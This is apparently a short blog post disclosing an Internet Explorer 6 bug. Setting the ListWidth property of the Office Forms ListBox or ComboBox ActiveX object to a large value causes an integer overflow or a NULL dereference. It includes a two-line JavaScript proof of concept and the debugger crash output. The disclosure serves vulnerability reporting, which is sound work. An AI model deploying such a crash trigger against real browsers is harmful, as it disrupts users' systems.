The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.
var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;
Demonstration
eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????
This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment